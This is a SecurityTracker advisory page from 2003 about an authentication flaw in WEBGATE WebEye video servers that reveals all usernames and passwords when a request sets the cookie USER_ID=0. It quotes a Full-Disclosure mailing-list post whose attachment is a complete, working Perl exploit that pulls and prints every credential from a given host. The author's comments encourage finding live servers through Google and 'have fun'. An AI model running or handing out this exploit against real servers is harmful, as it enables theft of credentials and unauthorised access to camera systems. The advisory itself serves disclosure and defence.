SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Multimedia)  >   WebEye Vendors:   WEBGATE, Inc.
Web Eye Video Servers Disclose Usernames and Passwords
SecurityTracker Alert ID:  1008417
SecurityTracker URL:  http://securitytracker.com/id/1008417
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Dec 9 2003
Impact:   Disclosure of authentication information, Disclosure of system information, Disclosure of user information, User access via network
Exploit Included:  Yes  

Description:   A vulnerability was reported in the Web Eye video servers. A remote user can obtain usernames and passwords from the target server.

datapath reported that a remote user can submit an HTTP request to the '/admin/wg_user-info.ml' with the following cookie set:

USER_ID=0; path=/;

Impact:   A remote user can obtain usernames and passwords from the target server.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.webgateinc.com/wg_htdocs/english/ (Links to External Site)
Cause:   Authentication error

Message History:   None.


 Source Message Contents

Subject:  [Full-Disclosure] webeye exploit


This is a MIME-formatted message.  If you see this text it means that your
mail software cannot handle MIME-formatted messages.

--=_0_18974_1070829414
Content-Type: text/plain; format=flowed; charset=iso-8859-1
Content-Transfer-Encoding: 7bit

Hi,
I have just written it.
Hope you like it.
--=_0_18974_1070829414
Content-Disposition: attachment; filename="webeye-xp.pl"
Content-Type: text/plain; charset="iso-8859-1"; name="webeye-xp.pl"
Content-Transfer-Encoding: 7bit

#!/usr/bin/perl

########################################################################
# Author: datapath
# E-mail: datapath@softhome.net
# Date: Dec 2003
# 44c545672ac14e9e0f968b3affcd0740

# WHAT IS THIS?
#  This is an exploit to retrieve all username and passwords from a
#  webeye video server.

# REQUIREMENTS
#  It requires some perl libraries. If you dont have them already
#  installed, search cpan.org.

# HOW DOES IT WORKS?
#  Well, its very simple, because the server provides a mechanism (not 
#  documented) to retrieve all passwords! You can read the code below,
#  its short and simple.

#  If you think its fun, but dont know any webeye video server, just make a 
#  search in Google. You will find a lot of them! Have fun!
###########################################################################

use LWP::UserAgent;
use HTTP::Cookies;

$host=shift;

if ($host eq "") {
  print "Usage: webeye-xp.pl <host name>\n";
  exit;
}

my $browser = LWP::UserAgent->new();

my $resp = $browser->get("http://$host/admin/wg_user-info.ml","Cookie","USER_ID=0; path=/;");

$t = $resp->content;

#print $t;

$i = index($t,"<tr");
substr($t,0,$i+1,"");

while ($i!=-1) {
  $i = index($t,"<tr");
  substr($t,0,$i+1,"");
  $i = index($t,"value=");
  substr($t,0,$i+7,"");
  $j = index($t,"\"");
  $user = substr($t,0,$j);
  if ($user =~ /Apply/) { print "\nHave fun!\n"; exit; }
  print "user: ".$user;
  $i = index($t,"value=");
  substr($t,0,$i+7,"");
  $j = index($t,"\"");
  print "\tpass: ".substr($t,0,$j)."\n";
}

--=_0_18974_1070829414--

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC